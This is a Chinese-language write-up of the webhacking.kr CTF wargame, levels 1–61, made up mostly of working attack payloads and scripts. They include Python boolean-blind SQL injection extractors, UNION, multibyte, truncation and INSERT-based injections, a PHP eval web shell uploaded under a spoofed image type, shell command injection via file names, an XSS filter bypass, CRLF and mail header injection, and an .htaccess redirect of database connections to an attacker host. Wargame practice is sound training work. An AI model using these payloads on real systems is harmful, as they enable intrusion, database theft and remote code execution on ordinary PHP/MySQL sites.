level1
if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;// any char other than digits, ',' or '.' resets user_lv to 1 -- a charset check only, never "is this one well-formed number" (eregi(): case-insensitive POSIX regex, removed in PHP 7)
if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;// 6 and above also reset to 1
if($_COOKIE[user_lv]>5) @solve();// so any value in the open interval (5,6) -- e.g. the string "5.5", which PHP compares numerically -- solves the level
修改 cookie[user_lv]=5.5:只含数字和小数点,能通过第一行 eregi 的字符过滤;它小于 6、大于 5,于是进入 @solve()。过滤只检查字符集,并没有检查值是不是一个合法的整数,这就是漏洞所在。
level2
index.php的源码发现:
cookie中发现time
把 cookie[time] 分别改成 `1538965314 and 1` 和 `1538965314 and 0`,页面显示的时间不同(条件为真时显示 2070-01-01 09:00:01,见下文),由此确认 cookie 存在布尔盲注(boolean-based blind SQL injection)。
在查看index.php时发现admin/目录
admin页面有一个输入框,需要密码才能进入,通过cookie盲注获取密码
通过设置 cookie[time]=1538965314 and length((select password from admin))>0,根据index.php的源码:2070-01-01 09:00:01,发现存在admin表和password字段。
1538965314 and length((select password from admin))=10 密码长度为10
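import string

URL = 'http://webhacking.kr/challenge/web/web-02/index.php'
PHPSESSID = ''  # fill in a valid session id
# Page text seen only when the injected condition is true (observed in the
# writeup while confirming the admin table / password column).
TRUE_MARKER = '2070-01-01 09:00:01'
PASSWORD_LENGTH = 10  # found with: 1538965314 and length((select password from admin))=10
CHARSET = string.printable


def build_payload(position, char, table='admin', base='1538965314'):
    """Return the `time` cookie value that tests one password character.

    position: 1-based index into the password (MySQL substr() is 1-based).
    char:     candidate character; sent as its ASCII code, so no quoting is
              needed and the raw character never enters the cookie.
    table:    table whose `password` column is read; the writeup reuses this
              script with table='FreeB0aRd'.
    base:     the value the cookie normally carries; the condition is
              appended to it with `and`.
    """
    return '{0} and ascii(substr((select password from {1}),{2},1))={3}'.format(
        base, table, position, ord(char))


def extract_password(length=PASSWORD_LENGTH, table='admin', charset=CHARSET,
                     session_id=PHPSESSID, url=URL):
    """Recover the password one character at a time (boolean-based blind).

    One request per (position, candidate); the first candidate whose
    response contains TRUE_MARKER is kept. Raises RuntimeError if no
    candidate matches a position -- the original silently moved on, which
    shifted every later character one place to the left.
    Returns the recovered string.
    """
    import requests  # third-party; local import keeps build_payload importable without it

    cookies = {'PHPSESSID': session_id}
    found = ''
    for position in range(1, length + 1):
        for candidate in charset:
            cookies['time'] = build_payload(position, candidate, table)
            # .text rather than .content: the marker test must be str-vs-str on Python 3
            body = requests.get(url, cookies=cookies).text
            if TRUE_MARKER in body:
                found += candidate
                print(found)
                break
        else:
            raise RuntimeError('no candidate matched position %d (so far: %r)' % (position, found))
    return found


if __name__ == '__main__':
    extract_password()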
得到一个提示:@dM1n__nnanual
在http://webhacking.kr/challenge/web/web-02/bbs/read.php?No=1页面发现密码框。表名是:FreeB0aRd,字段名是:password
将上面的py脚本中的admin改为FreeB0aRd,可获得password
payload='1538965314 and ascii(substr((select password from FreeB0aRd),{0},1))={1}'.format(i,ord(j))
输入密码可以获得一个加密的zip文件,使用admin给我们的提示就可以通关。
level3
拼图游戏:
获得一个输入框,有隐藏的表单
<input name="answer" value="1010100000011100101011111" type="hidden">
修改value=1010100000011100101011111||1 绕过黑名单进行注入
level4
先做一次 base64 解码,再做二次 MD5 反查(MD5 是单向哈希,所谓"解密"只是用彩虹表/在线库反查原文)。
level5
点击login进入登录页面
发现http://webhacking.kr/challenge/web/web-05/mem/目录泄露
发现join.php,页面源代码发现script脚本
document.write('<form method=post action='+llllllllll+lllllllllllllll+lllllllll+llllllllllllll+li+llllllllllllllll+llllllll+llllllllllllllll
+'>');document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name='+lllllllll+llll+' maxlength=5></td></tr>');document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name='+llllllllllllllll+lllllllllllllllllllllll+' maxlength=10></td></tr>');document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>')
把这段js扔到浏览器执行可以看到注册的输入框。
注册一个 id 为 admin+多个空格+a 的用户。前端的 maxlength=5 只是客户端限制,可以直接绕过;推测服务端先检查 admin 是否已存在(带空格的字符串不相等),再按列长度截断掉末尾的 a,最终存入的 id 就等于 admin(SQL 截断攻击)。
admin%20%20%20%20%20%20%20%20%20%20%20%20a
然后进入login.php登陆通关
level6
index.phps中
$val_id="guest";
$val_pw="123qwe";
将他们改为admin,执行php代码进行20次base64编码,然后替换,再写入cookie。
level7
select lv from lv1 where lv=($go)
?val=-1)union%09select(3-1
select lv from lv1 where lv=(-1)union%09select(3-1)
遇到mod_security
level8
User-Agent: a','1','admin')#
User-Agent: a
insert into lv0(agent,ip,id) values('$agent','$ip','guest')
insert into lv0(agent,ip,id) values('a','1','admin')#','$ip','guest')
select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'
select id from lv0 where agent='a'
level9
?no=if(substr(id,1,1)in(0x61),3,0)
条件成立no=3否则no=0
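import string

URL = 'http://webhacking.kr/challenge/web/web-09/'
PHPSESSID = ''  # fill in a valid session id
# The row selected by no=3 contains 'Secret'; no=0 selects nothing.
TRUE_MARKER = 'Secret'
ID_LENGTH = 11
CHARSET = string.printable


def build_payload(position, char):
    """Return the `no` parameter that tests one character of `id`.

    The candidate is sent as a MySQL hex literal (0x61 for 'a'), so the raw
    character never appears in the URL and no quotes are needed. The
    expression evaluates to 3 when the character matches and 0 otherwise,
    i.e. the page shows the no=3 row only on a match.
    """
    return 'if(substr(id,{0},1)in(0x{1:02x}),3,0)'.format(position, ord(char))


def extract_id(length=ID_LENGTH, charset=CHARSET, session_id=PHPSESSID, url=URL):
    """Recover the hidden `id` one character at a time (boolean-based blind).

    One GET per (position, candidate); the first candidate whose response
    contains TRUE_MARKER is kept. Raises RuntimeError if no candidate
    matches a position instead of silently producing a shorter, shifted
    result as the original did. Returns the recovered string.
    """
    import requests  # third-party; local import keeps build_payload importable without it

    cookies = {'PHPSESSID': session_id}
    found = ''
    for position in range(1, length + 1):
        for candidate in charset:
            # .text rather than .content so the marker test is str-vs-str on Python 3
            body = requests.get(url + '?no=' + build_payload(position, candidate),
                                cookies=cookies).text
            if TRUE_MARKER in body:
                found += candidate
                print(found)
                break
        else:
            raise RuntimeError('no candidate matched position %d (so far: %r)' % (position, found))
    return found


if __name__ == '__main__':
    extract_id()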
level10
id为hackme的a标签有一个onclick事件
if(this.style.posLeft==800)this.href='?go='+this.style.posLeft"
在浏览器的控制台输入
hackme.style.posLeft=799
点击a标签,会自动+1,然后跳转
level11
$pat="/[1-3][a-f]{5}_.*111.54.136.112.*\tp\ta\ts\ts/";
?val=1aaaaa_111a54a136a112%09p%09a%09s%09s
level12
js在浏览器执行
ck="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3);
alert("Password is "+ck.replace("=",""));
level13
通过?no=if((select%0Acount(flag)%0Afrom%0aprob13password)in(2),1,0)
得知flag有2个,min(flag),max(flag)分别选中
通过?no=if((select%0Asubstr(min(flag),1,1)from%0Aprob13password)in(0x63),1,0)
获取flag
level14
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
password=ul*2
level15
document.write("password is off_script");
level16
if(cd==124) location.href=String.fromCharCode(cd);
location.href=|
level17
level18
?no=-1%0Aor%0A1%0Aorder%0Aby%0Aid%0Aasc
select id from challenge18_table where id='guest' and no=-1 or 1 order by id asc
等价于
select id from challenge18_table order by id asc
level19
level20
lv5frm.id.value="a";
lv5frm.cmt.value="b";
lv5frm.hack.value=lv5frm.attackme.value;
lv5frm.submit()
在一定时间内验证码有效
level21
?no=0||id=0x61646d696e&&pw%0Alike%0A0x6125%23
select * from table where no=0 || id='admin' && pw like 'b%'#
level22
在username输入admin',点击login
出现Warning: mysql_fetch_array()
admin'&&1# 回显Wrong password!
admin'&&0# 回显Wrong
admin'&&pw like 'a%'#
level23
用 %00 把 script 拆开:推测过滤器按完整的 `script` 关键字做匹配,而空字节在输出时被去掉,浏览器最终收到的仍是 `<script>alert(1);</script>`。
?code=<s%00cript>alert(1)%3B<%2Fs%00cript>
level24
extract($_COOKIE);
从数组中将变量导入到当前的符号表
cookie[REMOTE_ADDR]=112277..00..00..1
level25
?file=password.php%00
level26
服务端做了两次 urldecode:把 admin 双重 URL 编码(%25%36%31… 第一次解码得到 %61…,第二次得到 admin),推测对明文 admin 的检查发生在第一次解码之前,所以能绕过。
?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
level27
0)or%0A1%0Aorder%0Aby%0Aid%0Aasc-- -
level28
hint : .htaccess
echo 'php_flag engine off' > .htaccess
上传 .htaccess(内容为 php_flag engine off)让 upload/ 目录下的 .php 不再被 PHP 解析,变成普通文本文件;再访问 upload/index.php 就能直接读到它的源码。
bypass mod_security
level29
payload=',(select password from c29_tb),0x3131302e35332e3133362e313132)#
sql语句:insert into table(filename,time,ip) values('',(select password from c29_tb),0x3131302e35332e3133362e313132)#','','')
ip 字段要和自己的 IP 一致才有回显(0x3131302e35332e3133362e313132 就是 '110.53.136.112' 的十六进制,换成自己的 IP)。
level30
mysql_connect()
没有指定数据库的host,username,password
.htaccess 里可以用 php_value 覆盖 php.ini 配置;mysql_connect() 不带参数时用的就是下面这几个 mysql.default_* 默认值(仅限旧的 ext/mysql 扩展,PHP 7 已移除),所以可以把数据库连接指向自己控制的 MySQL 服务器。
php_value mysql.default_host "x.x.x.x"
php_value mysql.default_user "root"
php_value mysql.default_password "root"
level31
题目会向 10000-10100 范围内的某个端口发起连接(从解法用 nc -l 监听来看,是服务器主动连回你的主机,方向为 server → client)。
nc -l 10014
level32
翻到底部
点击自己的id增加排名,第二次点击,cookie会多一个vote_check项,删掉它继续点击即可。
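URL_TEMPLATE = 'http://webhacking.kr/challenge/codeing/code5.html?hit={id}'
HIT_ID = ''     # your own id on the ranking page
PHPSESSID = ''  # your session cookie
VOTES = 100


def vote_url(hit_id):
    """Return the ranking URL that registers one hit for `hit_id`."""
    return URL_TEMPLATE.format(id=hit_id)


def vote(hit_id=HIT_ID, session_id=PHPSESSID, times=VOTES):
    """Hit the ranking endpoint `times` times.

    Per the writeup the second click sets a `vote_check` cookie that blocks
    further votes; sending a fresh cookie dict holding only PHPSESSID on
    every request never stores it, which is the whole bypass. Response
    bodies are not needed and are discarded.
    """
    import requests  # third-party; local import keeps vote_url importable without it

    url = vote_url(hit_id)
    for _ in range(times):
        requests.get(url, cookies={'PHPSESSID': session_id})


if __name__ == '__main__':
    vote()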
level33
step 1 ?get=hehe
step 2 POST post=hehe&&post2=hehe2
step 3 ?myip={ip}
step 4 :
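import hashlib
import time

URL = 'http://webhacking.kr/challenge/bonus/bonus-6/l4.php'
# Fill in your own session id. The writeup had a live PHPSESSID pasted here;
# a session cookie is a credential and does not belong in a published script.
PHPSESSID = ''


def make_password(timestamp):
    """Return the md5 hex digest of str(int(timestamp) + 1).

    The +1 presumably anticipates the server evaluating time() one second
    after the client did -- TODO confirm against l4.php. Encoding to bytes
    is what makes this run on Python 3 as well as 2.
    """
    return hashlib.md5(str(int(timestamp) + 1).encode('ascii')).hexdigest()


def fetch(session_id=PHPSESSID, url=URL):
    """GET l4.php with password=make_password(now) and return the body text."""
    import requests  # third-party; local import keeps make_password importable without it

    params = {'password': make_password(time.time())}
    return requests.get(url, params=params, cookies={'PHPSESSID': session_id}).text


if __name__ == '__main__':
    print(fetch())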
step 5 POST kk=md5('user-agent') cookie[test]=md5('remote-addr')
step 6 ?{ip去除.}={ip去除.}
step 7 ?addr=127.0.0.1
step 8 ?ans=acegikmoqsuwy
step 9 print "answerip/$ip/$answer.$ip";
level34
F12
location.href='Passw0RRdd.pww'
level35
insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]',$_GET[phone])
insert into challenge35_list(id,ip,phone) values('xx','127.0.0.1',1234),('admin',{ip},8888)
?phone=1234),(char(97,100,109,105,110),char(51,49,57,46,51,57,46,49,56,48,46,55,51),8888
level36
.index.php.swp
level37
$f=@fopen("tmp/$file_nm","w");// $file_nm is set outside this excerpt; per the writeup it is "tmp-$time"
@fwrite($f,$_SERVER[REMOTE_ADDR]);// the visitor's address becomes the file's content (its first line)
把ip写入tmp/tmp-$time
$ck=file("tmp/tmp-$time");// re-read by a time-derived name: whoever can place a file at that path controls $ck
$ck=$ck[0];// first line only
$socket=@fsockopen($ck,7777,$errstr,$errno,1);// outbound TCP connect to $ck:7777 with a 1 s timeout -- the destination comes from the file, i.e. it is attacker-influenceable
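import time

URL = 'http://webhacking.kr/challenge/web/web-18/'
PHPSESSID = ''  # fill in a valid session id


def make_filename(timestamp):
    """Return the server-side temp file name for `timestamp`: tmp-<epoch seconds>."""
    return 'tmp-' + str(int(timestamp))


def upload(content='', session_id=PHPSESSID, url=URL):
    """Upload a file named like the server's own tmp/tmp-<time> file.

    The PHP excerpt above writes REMOTE_ADDR to tmp/tmp-$time, re-reads the
    first line of that file and fsockopen()s to it on port 7777. Uploading a
    same-named file (assuming uploads land in tmp/ -- not shown here) puts
    `content` in that first line, so pass the address of a host where you
    are listening on 7777; the original script sent an empty body. The name
    is derived from the client clock, so it only collides with the server's
    file when both agree on the second -- retry if nothing connects back.
    Returns the response body text.
    """
    import requests  # third-party; local import keeps make_filename importable without it

    filename = make_filename(time.time())
    response = requests.post(url, files={'upfile': (filename, content)},
                             cookies={'PHPSESSID': session_id})
    return response.text


if __name__ == '__main__':
    print(upload())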
level38
日志注入:在输入里插入换行符新开一行,伪造一条 `ip:admin` 的记录。
level39
$_POST[id]=str_replace("'","''",$_POST[id]);// escape: every single quote is doubled
$_POST[id]=substr($_POST[id],0,15);// then truncate to 15 bytes -- AFTER escaping, so a doubled '' straddling byte 15 is cut back to a lone '
select 'good' from zmail_member where id='$_POST[id]
// SQL 语句里的引号没有闭合;输入的单引号会被替换成两个('')。
14 个空格 + 一个单引号:转义后变成 16 个字符(14 个空格 + ''),substr 截成 15 个字符后正好只剩一个单引号,它闭合了 SQL 语句里那个未闭合的引号。先转义、后截断的顺序是漏洞根源。
level40
?no=0||id=0x61646d696e#
获得admin的登录框
0||id=0x61646d696e&&length(pw)=10# 密码长度为10
0||id=0x61646d696e&&pw%0Alike%0Abinary%0A0x6125# 获取密码
level41
$fn=str_replace("<","",$fn);
上传一个文件名为<的文件
copy($cp,"$hidden_dir/$fn");
str_replace 把 `<` 删掉后文件名为空,copy() 的目标只剩一个目录,于是报错;报错信息里带出了 $hidden_dir。
Warning: copy()
得到$hidden_dir
level42
查看源码
?down=dGVzdC50eHQ=
?down=base64('test.zip')
level43
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpg//修改此处
#!/usr/bin/php
<?php
eval($_POST[cmd]);
?>
level44
system("echo '$_POST[html]' ");
html='&l's'
system("echo ''&l's'")
命令注入 + 黑名单绕过:注入的第一个单引号闭合了 echo 的参数,`&` 结束了 echo 命令,后面的 `l's'` 被 shell 去掉引号后就是 `ls`。用引号拆分命令名可以绕过对命令关键字的黑名单。
level45
mb_convert_encoding
单引号会被转义成 \'(addslashes 之类),但 mb_convert_encoding 把 %aa 和紧随其后的 \(0x5c)当成一个多字节字符,反斜杠被"吃掉",单引号重新生效——典型的多字节编码 SQL 注入。
?id=%aa' or id=0x61646d696e#&pw=gu
level46
0||id=char(97,100,109,105,110)
level47
mail() 的多个 header 以换行分隔,在可控字段里注入换行加 `Cc: 你的邮箱` 就能把这封邮件抄送给其他邮箱(email header injection)。
level48
命令注入:上传的文件名被原样拼进删除命令(rm upload/<文件名>),没有引号也没有转义。
上传文件名为 ;ls
的文件
点击delete按钮, rm upload/;ls
level49
0||id=0x61646d696e
level50
?id=q%aa'/*&pw=*/union%0Aselect%0A3%23
level51
$input_pw=md5($_POST[pw],true);
pw传入的是二进制字符。
md5(1839431,true)=�7���ıA@J�'='��
level52
?id=blackJdog%0DSet-Cookies:%20id=blackJdog
%0A(LF)和 %0D(CR)都能在响应头里产生换行,从而注入新的响应头(CRLF / HTTP header injection)。
level53
?val=1 procedure analyse()
level54
修改2处js
aview.innerHTML+=x.responseText;
if(x.responseText=="") alert(aview.innerHTML);
level55
rank.php?score=11111||1%20 limit 2,1 procedure analyse()
找到pAsSw0RdzzzZ字段
substr,mid被过滤
?score=11111||1 and left(pAsSw0RdzzzZ,1) like 0x6325
level56
kk.php
level57
?msg=1&se=if(substr(pw,1,1)=0x61,sleep(5),0)
level58
F12
hackme.swf
level59
insert into c59 values('$_POST[id]',$_POST[phone],'guest')
id=nimda
phone=4,reverse(id)-- -
level60
cookie[PHPSESSID]不能有数字,
$session[id]唯一标识一个用户
同一个 PHPSESSID 的多个请求会被串行化:PHP 默认的文件 session 处理器在请求期间持有 session 文件的锁,后一个请求要等前一个释放锁后才能继续。
用PHPSESSID=bbbb请求会获得1s的时间来访问txt文件。需要用另一个PHPSESSID=aaaa请求url?mode=auth来读取它。
cookie1.py
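URL = 'http://webhacking.kr/challenge/web/web-37/?mode=auth'
PHPSESSID = 'aaaa'  # digit-free and different from cookie2.py's session id
ATTEMPTS = 100


def poll_auth(session_id=PHPSESSID, url=URL, attempts=ATTEMPTS):
    """Repeatedly request ?mode=auth and print each response body.

    Meant to run concurrently with cookie2.py, whose requests (under a
    different PHPSESSID) open the ~1 s window in which the txt file exists.
    The session id must differ because, per the writeup, requests sharing a
    PHPSESSID are executed one after another and would never overlap.
    """
    import requests  # third-party

    for _ in range(attempts):
        # .text rather than .content so Python 3 prints the page, not a bytes repr
        print(requests.get(url, cookies={'PHPSESSID': session_id}).text)


if __name__ == '__main__':
    poll_auth()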
cookie2.py
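URL = 'http://webhacking.kr/challenge/web/web-37/'
PHPSESSID = 'bbbb'  # digit-free and different from cookie1.py's session id
ATTEMPTS = 100


def trigger(session_id=PHPSESSID, url=URL, attempts=ATTEMPTS):
    """Keep hitting the index page and print each response body.

    Per the writeup each hit makes the txt file exist for about one second;
    cookie1.py, running at the same time under a different PHPSESSID, reads
    it via ?mode=auth. The session ids must differ because requests sharing
    a PHPSESSID are executed one after another and would never overlap.
    """
    import requests  # third-party

    for _ in range(attempts):
        # .text rather than .content so Python 3 prints the page, not a bytes repr
        print(requests.get(url, cookies={'PHPSESSID': session_id}).text)


if __name__ == '__main__':
    trigger()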
level61
将admin字符串作为id字段的值
?id=0x61646d696e as id